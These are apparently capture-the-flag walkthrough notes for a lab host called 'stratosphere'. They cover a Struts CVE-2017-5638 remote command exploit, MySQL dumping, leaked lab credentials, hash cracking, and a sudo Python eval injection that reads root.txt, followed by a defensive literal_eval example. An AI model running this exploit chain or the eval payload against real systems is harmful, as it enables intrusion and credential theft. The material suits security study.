- nmap:
- 22
- 80
- 8080
- -> /Monitoring/
- Checking: python struts-pwn.py --check --url http://stratosphere:8080/Monitoring/
- Exploit: python struts-pwn.py --url http://stratosphere:8080/Monitoring/ -c 'ls'
- CVE 2017-5638
- db_connect in tomcat folder (www)
- user=ssn_admin
- pass=AWs64@on*&
- /etc/tomcat/tomcat-users.xml:
- <user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui" />
- root@kali:~/stratosphere# ./pwn.sh 'echo "SHOW DATABASES" | mysql -u admin -padmin'
- echo "SHOW DATABASES" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "SHOW DATABASES" | mysql -u admin -padmin
- Database
- information_schema
- users
- root@kali:~/stratosphere# ./pwn.sh 'echo "use users; show tables;" | mysql -u admin -padmin'
- echo "use users; show tables;" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "use users; show tables;" | mysql -u admin -padmin
- Tables_in_users
- accounts
- root@kali:~/stratosphere# ./pwn.sh 'echo "use users; select * from accounts;" | mysql -u admin -padmin'
- echo "use users; select gobuster.sh LinEnum.sh nc.sh nikto.sh pwn.sh rev.sh stratosphere_8080_gobust.txt stratosphere_gobust.txt stratosphere_monitoring_8080_nikto.txt stratosphere_nikto_80.txt stratosphere.txt.gnmap stratosphere.txt.nmap stratosphere.txt.xml stratosphese.txt.gnmap stratosphese.txt.nmap stratosphese.txt.xml struts-pwn.py webserver.sh wordlists from accounts;" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "use users; select * from accounts;" | mysql -u admin -padmin
- fullName password username
- Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
- root@kali:~/stratosphere# ./pwn.sh 'echo "use users; describe accounts;" | mysql -u admin -padmin'
- echo "use users; describe accounts;" | mysql -u admin -padmin
- [*] URL: http://stratosphere:8080/Monitoring/
- [*] CMD: echo "use users; describe accounts;" | mysql -u admin -padmin
- Field Type Null Key Default Extra
- fullName varchar(45) YES NULL
- password varchar(30) YES NULL
- username varchar(20) YES NULL
- Use that password to SSH in as richard
- sudo -l: richard may run /usr/bin/python3 /home/richard/test.py
- 5af003e100c80923ec04d65933d382cb : kaybboo!
- d24f6fb449855ff42344feff18ee2819033529ff : ninjaabisshinobi
- 91ae5fc9ecbca9d346225063f23d2bd9 : legend72
- 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
- ../run/john /home/hendrik/blake.txt --format=Raw-Blake2 --fork=8 --wordlist=/home/hendrik/rockyou.txt
- ^^^^^^^^^^^^^^ Rabbit hole but interesting
- echo '__import__("os").system("cat /root/root.txt")' | sudo /usr/bin/python2.7 /home/richard/test.py
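Why that last line hands over root, and what a hardened test.py would do instead, as an added example (not from these notes; it assumes test.py reads stdin with Python 2's input(), which is eval(raw_input()) - the notes never show the script itself, so that is an assumption):

```python
import ast

# Constructed sample inputs: a harmless literal and the expression from the notes.
BENIGN = "[1, 2, 3]"
MALICIOUS = '__import__("os").system("cat /root/root.txt")'


def py2_input_equivalent(line: str):
    """What Python 2's input() does: evaluate the line as an expression.

    Under sudo this runs with root privileges, so any caller controlling
    stdin controls the script. Kept only for contrast; called on BENIGN only.
    """
    return eval(line)  # intentionally unsafe, illustrates the bug class


def safe_read(line: str):
    """Hardened replacement: accept Python literals only (lists, ints, str...).

    ast.literal_eval refuses calls, attribute access and names, so the
    __import__(...).system(...) payload raises instead of executing.
    """
    try:
        return ast.literal_eval(line)
    except (ValueError, SyntaxError) as exc:
        raise ValueError(f"rejected non-literal input: {line!r}") from exc


def risky_nodes(line: str):
    """Explain a rejection: the AST node types that make an input executable."""
    tree = ast.parse(line, mode="eval")
    return sorted({type(n).__name__ for n in ast.walk(tree)
                   if isinstance(n, (ast.Call, ast.Attribute, ast.Name))})


if __name__ == "__main__":
    print(safe_read(BENIGN))          # [1, 2, 3]
    print(risky_nodes(MALICIOUS))     # ['Attribute', 'Call', 'Name']
    try:
        safe_read(MALICIOUS)
    except ValueError as err:
        print(err)
```

The same applies to any root-owned script allowed via sudoers: if it must parse user text, parse literals, never expressions.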